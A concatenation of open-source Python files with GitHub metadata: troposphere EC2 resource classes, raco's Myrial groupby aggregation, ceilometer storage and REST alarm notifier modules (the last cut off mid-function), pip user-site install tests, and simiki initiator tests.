'Description': (basestring, False),
'GroupSet': (list, False),
'Ipv6AddressCount': (integer, False),
'Ipv6Addresses': ([Ipv6Addresses], False),
'PrivateIpAddress': (basestring, False),
'PrivateIpAddresses': ([PrivateIpAddressSpecification], False),
'SecondaryPrivateIpAddressCount': (integer, False),
'SourceDestCheck': (boolean, False),
'SubnetId': (basestring, True),
'Tags': (list, False),
}
class NetworkInterfaceAttachment(AWSObject):
resource_type = "AWS::EC2::NetworkInterfaceAttachment"
props = {
'DeleteOnTermination': (boolean, False),
'DeviceIndex': (integer, True),
'InstanceId': (basestring, True),
'NetworkInterfaceId': (basestring, True),
}
class Route(AWSObject):
resource_type = "AWS::EC2::Route"
props = {
'DestinationCidrBlock': (basestring, False),
'DestinationIpv6CidrBlock': (basestring, False),
'GatewayId': (basestring, False),
'InstanceId': (basestring, False),
'NatGatewayId': (basestring, False),
'NetworkInterfaceId': (basestring, False),
'RouteTableId': (basestring, True),
'VpcPeeringConnectionId': (basestring, False),
}
def validate(self):
conds = [
'DestinationCidrBlock',
'DestinationIpv6CidrBlock',
]
exactly_one(self.__class__.__name__, self.properties, conds)
class RouteTable(AWSObject):
resource_type = "AWS::EC2::RouteTable"
props = {
'Tags': (list, False),
'VpcId': (basestring, True),
}
class SecurityGroupEgress(AWSObject):
resource_type = "AWS::EC2::SecurityGroupEgress"
props = {
'CidrIp': (basestring, False),
'CidrIpv6': (basestring, False),
'DestinationPrefixListId': (basestring, False),
'DestinationSecurityGroupId': (basestring, False),
'FromPort': (network_port, True),
'GroupId': (basestring, True),
'IpProtocol': (basestring, True),
'ToPort': (network_port, True),
#
# Workaround for a bug in CloudFormation and EC2 where the
# DestinationSecurityGroupId property is ignored causing
# egress rules targeting a security group to be ignored.
# Using SourceSecurityGroupId instead works fine even in
# egress rules. AWS have known about this bug for a while.
#
'SourceSecurityGroupId': (basestring, False),
}
def validate(self):
conds = [
'CidrIp',
'CidrIpv6',
'DestinationPrefixListId',
'DestinationSecurityGroupId',
]
exactly_one(self.__class__.__name__, self.properties, conds)
class SecurityGroupIngress(AWSObject):
resource_type = "AWS::EC2::SecurityGroupIngress"
props = {
'CidrIp': (basestring, False),
'CidrIpv6': (basestring, False),
'FromPort': (network_port, False), # conditional
'GroupName': (basestring, False),
'GroupId': (basestring, False),
'IpProtocol': (basestring, True),
'SourceSecurityGroupName': (basestring, False),
'SourceSecurityGroupId': (basestring, False),
'SourceSecurityGroupOwnerId': (basestring, False),
'ToPort': (network_port, False), # conditional
}
def validate(self):
conds = [
'CidrIp',
'CidrIpv6',
'SourceSecurityGroupName',
'SourceSecurityGroupId',
]
exactly_one(self.__class__.__name__, self.properties, conds)
class SecurityGroupRule(AWSProperty):
props = {
'CidrIp': (basestring, False),
'CidrIpv6': (basestring, False),
'FromPort': (network_port, False),
'IpProtocol': (basestring, True),
'SourceSecurityGroupId': (basestring, False),
'SourceSecurityGroupName': (basestring, False),
'SourceSecurityGroupOwnerId': (basestring, False),
'ToPort': (network_port, False),
'DestinationSecurityGroupId': (basestring, False),
}
class SecurityGroup(AWSObject):
resource_type = "AWS::EC2::SecurityGroup"
props = {
'GroupName': (basestring, False),
'GroupDescription': (basestring, True),
'SecurityGroupEgress': (list, False),
'SecurityGroupIngress': (list, False),
'VpcId': (basestring, False),
'Tags': (list, False),
}
class Subnet(AWSObject):
resource_type = "AWS::EC2::Subnet"
props = {
'AvailabilityZone': (basestring, False),
'CidrBlock': (basestring, True),
'MapPublicIpOnLaunch': (boolean, False),
'Tags': (list, False),
'VpcId': (basestring, True),
}
class SubnetNetworkAclAssociation(AWSObject):
resource_type = "AWS::EC2::SubnetNetworkAclAssociation"
props = {
'SubnetId': (basestring, True),
'NetworkAclId': (basestring, True),
}
class SubnetRouteTableAssociation(AWSObject):
resource_type = "AWS::EC2::SubnetRouteTableAssociation"
props = {
'RouteTableId': (basestring, True),
'SubnetId': (basestring, True),
}
class Volume(AWSObject):
resource_type = "AWS::EC2::Volume"
props = {
'AutoEnableIO': (boolean, False),
'AvailabilityZone': (basestring, True),
'Encrypted': (boolean, False),
'Iops': (positive_integer, False),
'KmsKeyId': (basestring, False),
'Size': (positive_integer, False),
'SnapshotId': (basestring, False),
'Tags': (list, False),
'VolumeType': (basestring, False),
}
class VolumeAttachment(AWSObject):
resource_type = "AWS::EC2::VolumeAttachment"
props = {
'Device': (basestring, True),
'InstanceId': (basestring, True),
'VolumeId': (basestring, True),
}
class VPC(AWSObject):
resource_type = "AWS::EC2::VPC"
props = {
'CidrBlock': (basestring, True),
'EnableDnsSupport': (boolean, False),
'EnableDnsHostnames': (boolean, False),
'InstanceTenancy': (basestring, False),
'Tags': (list, False),
}
class VPCDHCPOptionsAssociation(AWSObject):
resource_type = "AWS::EC2::VPCDHCPOptionsAssociation"
props = {
'DhcpOptionsId': (basestring, True),
'VpcId': (basestring, True),
}
class VPCEndpoint(AWSObject):
resource_type = "AWS::EC2::VPCEndpoint"
props = {
'PolicyDocument': (policytypes, False),
'RouteTableIds': ([basestring], False),
'ServiceName': (basestring, True),
'VpcId': (basestring, True),
}
class VPCGatewayAttachment(AWSObject):
resource_type = "AWS::EC2::VPCGatewayAttachment"
props = {
'InternetGatewayId': (basestring, False),
'VpcId': (basestring, True),
'VpnGatewayId': (basestring, False),
}
class VPNConnection(AWSObject):
resource_type = "AWS::EC2::VPNConnection"
props = {
'Type': (basestring, True),
'CustomerGatewayId': (basestring, True),
'StaticRoutesOnly': (boolean, False),
'Tags': (list, False),
'VpnGatewayId': (basestring, True),
}
class VPNConnectionRoute(AWSObject):
resource_type = "AWS::EC2::VPNConnectionRoute"
props = {
'DestinationCidrBlock': (basestring, True),
'VpnConnectionId': (basestring, True),
}
class VPNGateway(AWSObject):
resource_type = "AWS::EC2::VPNGateway"
props = {
'Type': (basestring, True),
'Tags': (list, False),
}
class VPNGatewayRoutePropagation(AWSObject):
resource_type = "AWS::EC2::VPNGatewayRoutePropagation"
props = {
'RouteTableIds': ([basestring], True),
'VpnGatewayId': (basestring, True),
}
class VPCPeeringConnection(AWSObject):
resource_type = "AWS::EC2::VPCPeeringConnection"
props = {
'PeerVpcId': (basestring, True),
'VpcId': (basestring, True),
'Tags': (list, False),
'PeerOwnerId': (basestring, False),
'PeerRoleArn': (basestring, False),
}
class Monitoring(AWSProperty):
props = {
'Enabled': (boolean, False),
}
class NetworkInterfaces(AWSProperty):
props = {
'AssociatePublicIpAddress': (boolean, False),
'DeleteOnTermination': (boolean, False),
'Description': (basestring, False),
'DeviceIndex': (integer, True),
'Groups': ([basestring], False),
'Ipv6AddressCount': (integer, False),
'Ipv6Addresses': ([Ipv6Addresses], False),
'NetworkInterfaceId': (basestring, False),
'PrivateIpAddresses': ([PrivateIpAddressSpecification], False),
'SecondaryPrivateIpAddressCount': (integer, False),
'SubnetId': (basestring, False),
}
class SecurityGroups(AWSProperty):
props = {
'GroupId': (basestring, False),
}
class IamInstanceProfile(AWSProperty):
props = {
'Arn': (basestring, False),
}
class LaunchSpecifications(AWSProperty):
props = {
'BlockDeviceMappings': ([BlockDeviceMapping], False),
'EbsOptimized': (boolean, False),
'IamInstanceProfile': (IamInstanceProfile, False),
'ImageId': (basestring, True),
'InstanceType': (basestring, True),
'KernelId': (basestring, False),
'KeyName': (basestring, False),
'Monitoring': (Monitoring, False),
'NetworkInterfaces': ([NetworkInterfaces], False),
'Placement': (Placement, False),
'RamdiskId': (basestring, False),
'SecurityGroups': ([SecurityGroups], False),
'SpotPrice': (basestring, False),
'SubnetId': (basestring, False),
'UserData': (basestring, False),
'WeightedCapacity': (positive_integer, False),
}
class SpotFleetRequestConfigData(AWSProperty):
props = {
'AllocationStrategy': (basestring, False),
'ExcessCapacityTerminationPolicy': (basestring, False),
'IamFleetRole': (basestring, True),
'LaunchSpecifications': ([LaunchSpecifications], True),
'SpotPrice': (basestring, True),
'TargetCapacity': (positive_integer, True),
'TerminateInstancesWithExpiration': (boolean, False),
'ValidFrom': (basestring, False),
'ValidUntil': (basestring, False),
}
class SpotFleet(AWSObject):
resource_type = "AWS::EC2::SpotFleet"
props = {
'SpotFleetRequestConfigData': (SpotFleetRequestConfigData, True),
}
class PlacementGroup(AWSObject):
resource_type = "AWS::EC2::PlacementGroup"
props = {
'Strategy': (basestring, True),
}
class SubnetCidrBlock(AWSObject):
resource_type = "AWS::EC2::SubnetCidrBlock"
props = {
'Ipv6CidrBlock': (basestring, True),
'SubnetId': (basestring, True),
}
class VPCCidrBlock(AWSObject):
resource_type = "AWS::EC2::VPCCidrBlock"
props = {
'AmazonProvidedIpv6CidrBlock': (boolean, False),
'VpcId': (basestring, True),
}
|
{
"content_hash": "a4215d4acae567de30b44f346f7bfe8f",
"timestamp": "",
"source": "github",
"line_count": 674,
"max_line_length": 73,
"avg_line_length": 27.4540059347181,
"alnum_prop": 0.5985732814526589,
"repo_name": "7digital/troposphere",
"id": "80201ec3534cb5fc2e48a8dd4c54e22c1afc8d90",
"size": "18620",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "troposphere/ec2.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Makefile",
"bytes": "579"
},
{
"name": "Python",
"bytes": "356311"
},
{
"name": "Shell",
"bytes": "60"
}
],
"symlink_target": ""
}
|
"""
Implemention of groupby/aggregation in Myrial.
The inputs are a child Operator and a list of column mappings, each defined
by tuples of the form: (column_name, scalar_expression). The outputs are
(possibly) revised operators and list of column mappings.
The basic algorithm:
1) Scan the list of columns looking for any aggregte expressions. If none
are found, then we return the inputs unmodified.
2) Next, we scan each column, switching on whether the scalar expression
contains any aggregate expression:
2A) Columns without aggregate expressions are "groupby" terms. We add such
terms to a list of groupby terms.
2B) Columns with aggregate expressions are "aggregation" terms. We record all
aggregate expressions in a list (actually, an OrderedDict). And, we apply
a "hoisting" procedure whereby each aggregate expression is replaced by
a reference to a raw column reference. As an example:
range = max(salary) - min(salary)
==>
range = $4 - $5
3) We create a GroupBy relational algebra operation with the grouping terms
and aggregate terms calculated in steps 2A and 2B.
4) We return an updated set of column mappings; the Myrial interpreter
uses these mappings to form an Apply operator that stitches up the column
names and values as expected by the caller.
"""
import collections
import raco.expression
from raco.myrial.exceptions import *
class NonGroupedAccessException(Exception):
"""Attempting to access a non-grouping term in an aggregate expression"""
pass
class AggregateState(object):
def __init__(self, initial_aggregate_pos):
# Mapping from an aggregate scalar expression (e.g., MAX(salary)) to
# a non-aggregate scalar expression (a raw column index).
self.aggregates = collections.OrderedDict()
# Next index to be assigned for aggregate expressions
self.aggregate_pos = initial_aggregate_pos
def __hoist_aggregates(sexpr, agg_state, group_mappings, input_scheme):
def hoist_node(sexpr):
if isinstance(sexpr, raco.expression.AttributeRef):
# Translate the attribute ref to the schema that will exist
# after the GroupBy
input_pos = sexpr.get_position(input_scheme)
if input_pos not in group_mappings:
raise NonGroupedAccessException(str(sexpr))
output_pos = group_mappings[input_pos]
return raco.expression.UnnamedAttributeRef(output_pos)
if not isinstance(sexpr, raco.expression.AggregateExpression):
return sexpr
if sexpr in agg_state.aggregates:
return agg_state.aggregates[sexpr]
else:
out = raco.expression.UnnamedAttributeRef(agg_state.aggregate_pos)
agg_state.aggregates[sexpr] = out
agg_state.aggregate_pos += 1
return out
def recursive_eval(sexpr):
"""Apply hoisting to a scalar expression and all its descendents"""
newexpr = hoist_node(sexpr)
newexpr.apply(recursive_eval)
return newexpr
return recursive_eval(sexpr)
def groupby(op, emit_clause, extra_grouping_columns, statemods=None):
"""Process groupby/aggregation expressions."""
assert emit_clause
# A mapping from input position (before the GroupBy) to output position
# (after the GroupBy) for grouping terms. This allows aggregate terms
# to refer to grouping fields.
group_mappings = {}
scheme = op.scheme()
num_group_terms = 0
for name, sexpr in emit_clause:
if not raco.expression.expression_contains_aggregate(sexpr):
if isinstance(sexpr, raco.expression.AttributeRef):
group_mappings[sexpr.get_position(scheme)] = num_group_terms
num_group_terms += 1
# The user must have specified an aggregate expression to trigger
# a groupby invocation.
assert num_group_terms != len(emit_clause)
# Add extra grouping columns; we group by these terms, but the output
# is not preserved in the final apply invocation. These are columns
# that were referenced in unbox expressions.
for col in extra_grouping_columns:
group_mappings[col] = num_group_terms
num_group_terms += 1
# State about scalar expressions with aggregates
agg_state = AggregateState(num_group_terms)
# mappings from column name to scalar expressions; these mappings are
# applied after the GroupBy operator to stitch up column names and values.
output_mappings = []
# A subset of the scalar expressions in the emit clause that do
# not contain aggregate expressions; these become the grouping terms
# to the GroupBy operator.
group_terms = []
for name, sexpr in emit_clause:
if raco.expression.expression_contains_aggregate(sexpr):
output_mappings.append(
(name, __hoist_aggregates(sexpr, agg_state, group_mappings,
scheme)))
else:
output_mappings.append((
name, raco.expression.UnnamedAttributeRef(len(group_terms))))
group_terms.append(sexpr)
# Add extra grouping columns; note that these are not present in the
# output mappings.
group_terms.extend([raco.expression.UnnamedAttributeRef(c)
for c in extra_grouping_columns])
agg_terms = agg_state.aggregates.keys()
op1 = raco.algebra.GroupBy(group_terms, agg_terms, op, statemods)
return raco.algebra.Apply(emitters=output_mappings, input=op1)
|
{
"content_hash": "1af54c014cbd4525b421e44f5d357763",
"timestamp": "",
"source": "github",
"line_count": 146,
"max_line_length": 78,
"avg_line_length": 37.78767123287671,
"alnum_prop": 0.6931303244516948,
"repo_name": "uwescience/raco",
"id": "525f5bdf94f88d0122d7fbc1a5bf847fbe9a7b57",
"size": "5518",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "raco/myrial/groupby.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1777"
},
{
"name": "C++",
"bytes": "81472"
},
{
"name": "Makefile",
"bytes": "1063"
},
{
"name": "Python",
"bytes": "1035525"
},
{
"name": "Ruby",
"bytes": "3706"
},
{
"name": "Shell",
"bytes": "282"
}
],
"symlink_target": ""
}
|
"""Storage backend management
"""
import urlparse
from oslo.config import cfg
from stevedore import driver
from ceilometer.openstack.common.gettextutils import _ # noqa
from ceilometer.openstack.common import log
from ceilometer import service
from ceilometer import utils
LOG = log.getLogger(__name__)
STORAGE_ENGINE_NAMESPACE = 'ceilometer.storage'
OLD_STORAGE_OPTS = [
cfg.StrOpt('database_connection',
secret=True,
default=None,
help='DEPRECATED - Database connection string',
),
]
cfg.CONF.register_opts(OLD_STORAGE_OPTS)
STORAGE_OPTS = [
cfg.IntOpt('time_to_live',
default=-1,
help="""number of seconds that samples are kept
in the database for (<= 0 means forever)"""),
]
cfg.CONF.register_opts(STORAGE_OPTS, group='database')
cfg.CONF.import_opt('connection',
'ceilometer.openstack.common.db.sqlalchemy.session',
group='database')
class StorageBadVersion(Exception):
"""Error raised when the storage backend version is not good enough."""
def get_engine(conf):
"""Load the configured engine and return an instance."""
if conf.database_connection:
conf.set_override('connection', conf.database_connection,
group='database')
engine_name = urlparse.urlparse(conf.database.connection).scheme
LOG.debug(_('looking for %(name)r driver in %(namespace)r') % (
{'name': engine_name,
'namespace': STORAGE_ENGINE_NAMESPACE}))
mgr = driver.DriverManager(STORAGE_ENGINE_NAMESPACE,
engine_name,
invoke_on_load=True)
return mgr.driver
def get_connection(conf):
"""Return an open connection to the database."""
return get_engine(conf).get_connection(conf)
class SampleFilter(object):
"""Holds the properties for building a query from a meter/sample filter.
:param user: The sample owner.
:param project: The sample project.
:param start: Earliest time point in the request.
:param start_timestamp_op: Earliest timestamp operation in the request.
:param end: Latest time point in the request.
:param end_timestamp_op: Latest timestamp operation in the request.
:param resource: Optional filter for resource id.
:param meter: Optional filter for meter type using the meter name.
:param source: Optional source filter.
:param metaquery: Optional filter on the metadata
"""
def __init__(self, user=None, project=None,
start=None, start_timestamp_op=None,
end=None, end_timestamp_op=None,
resource=None, meter=None,
source=None, metaquery={}):
self.user = user
self.project = project
self.start = utils.sanitize_timestamp(start)
self.start_timestamp_op = start_timestamp_op
self.end = utils.sanitize_timestamp(end)
self.end_timestamp_op = end_timestamp_op
self.resource = resource
self.meter = meter
self.source = source
self.metaquery = metaquery
class EventFilter(object):
"""Properties for building an Event query.
:param start: UTC start datetime (mandatory)
:param end: UTC end datetime (mandatory)
:param event_type: the name of the event. None for all.
:param traits: the trait filter dict, all of which are optional
{'key': <key>,
't_string': <value>,
't_int': <value>,
't_datetime': <value>
't_float': <value>}
currently, only one trait dict is supported.
"""
def __init__(self, start, end, event_type=None, traits={}):
self.start = utils.sanitize_timestamp(start)
self.end = utils.sanitize_timestamp(end)
self.event_type = event_type
self.traits = traits
def dbsync():
service.prepare_service()
get_connection(cfg.CONF).upgrade()
def expirer():
service.prepare_service()
LOG.debug(_("Clearing expired metering data"))
storage_conn = get_connection(cfg.CONF)
storage_conn.clear_expired_metering_data(
cfg.CONF.database.time_to_live)
|
{
"content_hash": "2a717de08b0923b72b362c6ef4ad1e43",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 76,
"avg_line_length": 32.587786259541986,
"alnum_prop": 0.6312953853361443,
"repo_name": "rackerlabs/instrumented-ceilometer",
"id": "a0c39f3c437c540ccc3f6baeaedf5d3bf6026c06",
"size": "4955",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ceilometer/storage/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "149656"
},
{
"name": "JavaScript",
"bytes": "361114"
},
{
"name": "Python",
"bytes": "1897887"
},
{
"name": "Shell",
"bytes": "1322"
}
],
"symlink_target": ""
}
|
"""
tests specific to "pip install --user"
"""
import imp
import os
import textwrap
import pytest
from os.path import curdir, isdir, isfile
from pip.compat import uses_pycache
from tests.lib.local_repos import local_checkout
from tests.lib import pyversion
def _patch_dist_in_site_packages(script):
sitecustomize_path = script.lib_path.join("sitecustomize.py")
sitecustomize_path.write(textwrap.dedent("""
def dist_in_site_packages(dist):
return False
from pip.req import req_install
req_install.dist_in_site_packages = dist_in_site_packages
"""))
# Caught py32 with an outdated __pycache__ file after a sitecustomize
# update (after python should have updated it) so will delete the cache
# file to be sure
# See: https://github.com/pypa/pip/pull/893#issuecomment-16426701
if uses_pycache:
cache_path = imp.cache_from_source(sitecustomize_path)
if os.path.isfile(cache_path):
os.remove(cache_path)
class Tests_UserSite:
@pytest.mark.network
def test_reset_env_system_site_packages_usersite(self, script, virtualenv):
"""
reset_env(system_site_packages=True) produces env where a --user
install can be found using pkg_resources
"""
virtualenv.system_site_packages = True
script.pip('install', '--user', 'INITools==0.2')
result = script.run(
'python', '-c',
"import pkg_resources; print(pkg_resources.get_distribution"
"('initools').project_name)",
)
project_name = result.stdout.strip()
assert (
'INITools' == project_name, "'%s' should be 'INITools'" %
project_name
)
@pytest.mark.network
def test_install_subversion_usersite_editable_with_distribute(
self, script, virtualenv, tmpdir):
"""
Test installing current directory ('.') into usersite after installing
distribute
"""
virtualenv.system_site_packages = True
result = script.pip(
'install', '--user', '-e',
'%s#egg=initools-dev' %
local_checkout(
'svn+http://svn.colorstudy.com/INITools/trunk',
tmpdir.join("cache"),
)
)
result.assert_installed('INITools', use_user_site=True)
def test_install_curdir_usersite(self, script, virtualenv, data):
"""
Test installing current directory ('.') into usersite
"""
virtualenv.system_site_packages = True
run_from = data.packages.join("FSPkg")
result = script.pip(
'install', '-vvv', '--user', curdir,
cwd=run_from,
expect_error=False,
)
fspkg_folder = script.user_site / 'fspkg'
egg_info_folder = (
script.user_site / 'FSPkg-0.1.dev0-py%s.egg-info' % pyversion
)
assert fspkg_folder in result.files_created, result.stdout
assert egg_info_folder in result.files_created
def test_install_user_venv_nositepkgs_fails(self, script, data):
"""
user install in virtualenv (with no system packages) fails with message
"""
run_from = data.packages.join("FSPkg")
result = script.pip(
'install', '--user', curdir,
cwd=run_from,
expect_error=True,
)
assert (
"Can not perform a '--user' install. User site-packages are not "
"visible in this virtualenv." in result.stderr
)
@pytest.mark.network
def test_install_user_conflict_in_usersite(self, script, virtualenv):
"""
Test user install with conflict in usersite updates usersite.
"""
virtualenv.system_site_packages = True
script.pip('install', '--user', 'INITools==0.3')
result2 = script.pip('install', '--user', 'INITools==0.1')
# usersite has 0.1
egg_info_folder = (
script.user_site / 'INITools-0.1-py%s.egg-info' % pyversion
)
initools_v3_file = (
# file only in 0.3
script.base_path / script.user_site / 'initools' /
'configparser.py'
)
assert egg_info_folder in result2.files_created, str(result2)
assert not isfile(initools_v3_file), initools_v3_file
@pytest.mark.network
def test_install_user_conflict_in_globalsite(self, script, virtualenv):
"""
Test user install with conflict in global site ignores site and
installs to usersite
"""
# the test framework only supports testing using virtualenvs
# the sys.path ordering for virtualenvs with --system-site-packages is
# this: virtualenv-site, user-site, global-site
# this test will use 2 modifications to simulate the
# user-site/global-site relationship
# 1) a monkey patch which will make it appear INITools==0.2 is not in
# the virtualenv site if we don't patch this, pip will return an
# installation error: "Will not install to the usersite because it
# will lack sys.path precedence..."
# 2) adding usersite to PYTHONPATH, so usersite as sys.path precedence
# over the virtualenv site
virtualenv.system_site_packages = True
script.environ["PYTHONPATH"] = script.base_path / script.user_site
_patch_dist_in_site_packages(script)
script.pip('install', 'INITools==0.2')
result2 = script.pip('install', '--user', 'INITools==0.1')
# usersite has 0.1
egg_info_folder = (
script.user_site / 'INITools-0.1-py%s.egg-info' % pyversion
)
initools_folder = script.user_site / 'initools'
assert egg_info_folder in result2.files_created, str(result2)
assert initools_folder in result2.files_created, str(result2)
# site still has 0.2 (can't look in result1; have to check)
egg_info_folder = (
script.base_path / script.site_packages /
'INITools-0.2-py%s.egg-info' % pyversion
)
initools_folder = script.base_path / script.site_packages / 'initools'
assert isdir(egg_info_folder)
assert isdir(initools_folder)
@pytest.mark.network
def test_upgrade_user_conflict_in_globalsite(self, script, virtualenv):
"""
Test user install/upgrade with conflict in global site ignores site and
installs to usersite
"""
# the test framework only supports testing using virtualenvs
# the sys.path ordering for virtualenvs with --system-site-packages is
# this: virtualenv-site, user-site, global-site
# this test will use 2 modifications to simulate the
# user-site/global-site relationship
# 1) a monkey patch which will make it appear INITools==0.2 is not in
# the virtualenv site if we don't patch this, pip will return an
# installation error: "Will not install to the usersite because it
# will lack sys.path precedence..."
# 2) adding usersite to PYTHONPATH, so usersite as sys.path precedence
# over the virtualenv site
virtualenv.system_site_packages = True
script.environ["PYTHONPATH"] = script.base_path / script.user_site
_patch_dist_in_site_packages(script)
script.pip('install', 'INITools==0.2')
result2 = script.pip('install', '--user', '--upgrade', 'INITools')
# usersite has 0.3.1
egg_info_folder = (
script.user_site / 'INITools-0.3.1-py%s.egg-info' % pyversion
)
initools_folder = script.user_site / 'initools'
assert egg_info_folder in result2.files_created, str(result2)
assert initools_folder in result2.files_created, str(result2)
# site still has 0.2 (can't look in result1; have to check)
egg_info_folder = (
script.base_path / script.site_packages /
'INITools-0.2-py%s.egg-info' % pyversion
)
initools_folder = script.base_path / script.site_packages / 'initools'
assert isdir(egg_info_folder), result2.stdout
assert isdir(initools_folder)
@pytest.mark.network
def test_install_user_conflict_in_globalsite_and_usersite(
self, script, virtualenv):
"""
Test user install with conflict in globalsite and usersite ignores
global site and updates usersite.
"""
# the test framework only supports testing using virtualenvs.
# the sys.path ordering for virtualenvs with --system-site-packages is
# this: virtualenv-site, user-site, global-site.
# this test will use 2 modifications to simulate the
# user-site/global-site relationship
# 1) a monkey patch which will make it appear INITools==0.2 is not in
# the virtualenv site if we don't patch this, pip will return an
# installation error: "Will not install to the usersite because it
# will lack sys.path precedence..."
# 2) adding usersite to PYTHONPATH, so usersite as sys.path precedence
# over the virtualenv site
virtualenv.system_site_packages = True
script.environ["PYTHONPATH"] = script.base_path / script.user_site
_patch_dist_in_site_packages(script)
script.pip('install', 'INITools==0.2')
script.pip('install', '--user', 'INITools==0.3')
result3 = script.pip('install', '--user', 'INITools==0.1')
# usersite has 0.1
egg_info_folder = (
script.user_site / 'INITools-0.1-py%s.egg-info' % pyversion
)
initools_v3_file = (
# file only in 0.3
script.base_path / script.user_site / 'initools' /
'configparser.py'
)
assert egg_info_folder in result3.files_created, str(result3)
assert not isfile(initools_v3_file), initools_v3_file
# site still has 0.2 (can't just look in result1; have to check)
egg_info_folder = (
script.base_path / script.site_packages /
'INITools-0.2-py%s.egg-info' % pyversion
)
initools_folder = script.base_path / script.site_packages / 'initools'
assert isdir(egg_info_folder)
assert isdir(initools_folder)
@pytest.mark.network
def test_install_user_in_global_virtualenv_with_conflict_fails(
self, script, virtualenv):
"""
Test user install in --system-site-packages virtualenv with conflict in
site fails.
"""
virtualenv.system_site_packages = True
script.pip('install', 'INITools==0.2')
result2 = script.pip(
'install', '--user', 'INITools==0.1',
expect_error=True,
)
resultp = script.run(
'python', '-c',
"import pkg_resources; print(pkg_resources.get_distribution"
"('initools').location)",
)
dist_location = resultp.stdout.strip()
assert (
"Will not install to the user site because it will lack sys.path "
"precedence to %s in %s" %
('INITools', dist_location) in result2.stderr
)
|
{
"content_hash": "ab61e573e66b1ff148ffb718a5880724",
"timestamp": "",
"source": "github",
"line_count": 292,
"max_line_length": 79,
"avg_line_length": 38.62328767123287,
"alnum_prop": 0.6079978719631141,
"repo_name": "davidovich/pip",
"id": "049c7c8ee1fca9f0ffe31aff283def7ba5bd311e",
"size": "11278",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "tests/functional/test_install_user.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1835"
},
{
"name": "Python",
"bytes": "2223088"
},
{
"name": "Shell",
"bytes": "1905"
}
],
"symlink_target": ""
}
|
import os
import os.path
import unittest
import shutil
from simiki.config import get_default_config
from simiki.initiator import Initiator
class TestInitiator(unittest.TestCase):
def setUp(self):
BASE_DIR = os.path.join(os.path.dirname(__file__), '..')
self.default_config = get_default_config()
self.config_file = os.path.join(BASE_DIR, "simiki", "conf_templates",
"_config.yml.in")
self.target_path = os.path.join(BASE_DIR, "tests", "_build")
if os.path.exists(self.target_path):
shutil.rmtree(self.target_path)
self.files = [
"_config.yml",
"fabfile.py",
os.path.join(self.default_config['source'], "intro",
"gettingstarted.md"),
]
self.dirs = [
self.default_config['source'],
self.default_config['destination'],
self.default_config['themes_dir'],
os.path.join(self.default_config['themes_dir'],
self.default_config['theme']),
]
def test_target_exist(self):
""" test Initiator target path exist
"""
i = Initiator(self.config_file, self.target_path)
i.init(ask=False)
for f in self.files:
self.assertTrue(os.path.isfile(os.path.join(self.target_path, f)))
for d in self.dirs:
self.assertTrue(os.path.isdir(os.path.join(self.target_path, d)))
def test_target_invalid(self):
""" test Initiator target path invalid, raise OSError
"""
target_error = "/foo/bar/why/not"
i = Initiator(self.config_file, target_error)
self.assertRaises(OSError, lambda: i.init())
def tearDown(self):
if os.path.exists(self.target_path):
shutil.rmtree(self.target_path)
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "d3bbadd7291037b36a0a9faad03d0d8d",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 78,
"avg_line_length": 31.360655737704917,
"alnum_prop": 0.5703084161003659,
"repo_name": "tankywoo/simiki",
"id": "f028e7d0c745b6794ae7b7d81fc2728ea358a6ad",
"size": "1960",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_initiator.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "27002"
},
{
"name": "Dockerfile",
"bytes": "161"
},
{
"name": "HTML",
"bytes": "11438"
},
{
"name": "Makefile",
"bytes": "904"
},
{
"name": "Python",
"bytes": "100696"
},
{
"name": "Shell",
"bytes": "1138"
}
],
"symlink_target": ""
}
|
"""Rest alarm notifier."""
import eventlet
from oslo.config import cfg
from oslo.serialization import jsonutils
import requests
import six.moves.urllib.parse as urlparse
from ceilometer.alarm import notifier
from ceilometer.openstack.common import context
from ceilometer.openstack.common.gettextutils import _
from ceilometer.openstack.common import log
LOG = log.getLogger(__name__)
OPTS = [
cfg.StrOpt('rest_notifier_certificate_file',
default='',
help='SSL Client certificate for REST notifier.'
),
cfg.StrOpt('rest_notifier_certificate_key',
default='',
help='SSL Client private key for REST notifier.'
),
cfg.BoolOpt('rest_notifier_ssl_verify',
default=True,
help='Whether to verify the SSL Server certificate when '
'calling alarm action.'
),
cfg.IntOpt('rest_notifier_max_retries',
default=0,
help='Number of retries for REST notifier',
),
]
cfg.CONF.register_opts(OPTS, group="alarm")
class RestAlarmNotifier(notifier.AlarmNotifier):
"""Rest alarm notifier."""
@staticmethod
def notify(action, alarm_id, previous, current, reason, reason_data,
headers=None):
headers = headers or {}
if not headers.get('x-openstack-request-id'):
headers['x-openstack-request-id'] = context.generate_request_id()
LOG.info(_(
"Notifying alarm %(alarm_id)s from %(previous)s "
"to %(current)s with action %(action)s because "
"%(reason)s. request-id: %(request_id)s") %
({'alarm_id': alarm_id, 'previous': previous,
'current': current, 'action': action,
'reason': reason,
'request_id': headers['x-openstack-request-id']}))
body = {'alarm_id': alarm_id, 'previous': previous,
'current': current, 'reason': reason,
'reason_data': reason_data}
headers['content-type'] = 'application/json'
kwargs = {'data': jsonutils.dumps(body),
'headers': headers}
if action.scheme == 'https':
default_verify = int(cfg.CONF.alarm.rest_notifier_ssl_verify)
options = urlparse.parse_qs(action.query)
verify = bool(int(options.get('ceilometer-alarm-ssl-verify',
[default_verify])[-1]))
kwargs['verify'] = verify
cert = cfg.CONF.alarm.rest_notifier_certificate_file
key = cfg.CONF.alarm.rest_notifier_certificate_key
if cert:
kwargs['cert'] = (cert, key) if key else cert
# FIXME(rhonjo): Retries are automatically done by urllib3 in requests
# library. However, there's no interval between retries in urllib3
# implementation. It will be better to put some interval between
# retries (future work).
max_retries = cfg.CONF.alarm.rest_notifier_max_retries
session = requests.Session()
session.mount(action.geturl(),
requests.adapters.HTTPAdapter(max_retries=max_retries))
